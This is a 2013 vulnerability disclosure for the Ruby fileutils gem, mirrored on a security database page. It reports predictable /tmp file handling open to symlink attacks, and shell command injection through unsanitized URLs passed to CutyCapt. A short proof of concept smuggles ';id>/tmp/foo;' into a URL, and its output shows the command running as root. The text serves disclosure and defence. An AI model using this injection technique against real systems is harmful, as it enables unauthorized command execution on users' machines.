Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:29131
HistoryMar 03, 2013 - 12:00 a.m.

Fileutils ruby gem possible remote command execution and insecure file handling in /tmp

2013-03-0300:00:00
vulners.com
74
JSON

Fileutils ruby gem possible remote command execution and insecure file handling in /tmp
2/23/2013

Hi list, I was looking at some gem files and noticed a few issues with fileutils-0.7

http://rubygems.org/gems/fileutils

"A set of utility classes to extract meta data from different file types".

Handles files insecurely in /tmp, a directory is created for that file extension say 'zip' and files are created/modified there. This directory can be hijacked and the contents manipulated by a malicious user.

in ./lib/file_utils.rb

15 def zip (target, *sources)
16 targetdir = "{FileUtils::Config.tmp_dir}/zip"
17 id = 1
18 while File.exists?(targetdir)
19 targetdir = "{FileUtils::Config.tmp_dir}/zip#{id}"
20 id += 1
21 end
22 FileUtils.mkdir(targetdir)

where Config.tmp_dir = /tmp

in ./lib/file_utils/config.rb

5 def self.tmp_dir
6 @tmp_dir ||= '/tmp'
7 end

Remote command execution:

From file_utils.rb, doesn't sanitize input on URLs passed to CutyCapt for execution. If a URL contains shell characters say a ';' followed by a command a remote attacker execute a command on the clients system if they are enticed to click an encoded url like:

need to test URL encoding not sure if this is valid.

http://bla.net.org;id>/tmp/o; -> http://tinyurl.com/a5scxzz

7 def capture (url, target)
8 command = FileUtils::Config::Xvfb.command(File.dirname(FILE) + "/…/bin/CutyCapt --min-width=1024 --min-height=768 --url={url} --out={target}")
9 `#{command}`
10 end

partial PoC if client is tricked into using malicious URL:

irb(main):001:0> `xvfb-run --server-args="-screen 0,1024x768x24" ./CutyCapt --url=http://www.example.org;id>/tmp/foo; --out=/tmp/tempf` xvfb-run: error: Xvfb failed to start
sh: 1: --out=/tmp/tempf: not found
=> ""
irb(main):002:0>

root@ubuntu:~/CutyCapt/cutycapt/CutyCapt ls -l /tmp/foo
-rw-r–r-- 1 root root 39 Feb 27 02:56 /tmp/foo
root@ubuntu:~/CutyCapt/cutycapt/CutyCapt cat /tmp/foo
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~/CutyCapt/cutycapt/CutyCapt#

Michael Scherer of Redhat.com found other issues during a discussion about the above issues I found:

In fact, there is the same similar problem in another file :
result = `#{FileUtils::Config::OpenOffice.python} #{command} #{source} #{target} #{FileUtils::Config::OpenOffice.port}`

I quickly checked using irb ( a quick command line to type ruby snippet, and yes, using funky chars result in funky results.

There is another issue in

Generates a temp filepath for the given extension def temp (extension)

path = "{FileUtils::Config.tmp_dir}/tmp.{extension}" id = 1
while File.exists?(path)

    path = "{FileUtils::Config.tmp_dir}/tmp.{id}.#{extension}"
    id += 1

end

Since someone could just create the file at the last moment, and make a link so the script would overwrite an arbitrary file.

Thanks to vl4dz and Michael.

Larry W. Cashdollar @_larry0
http://vapid.dhs.org

JSON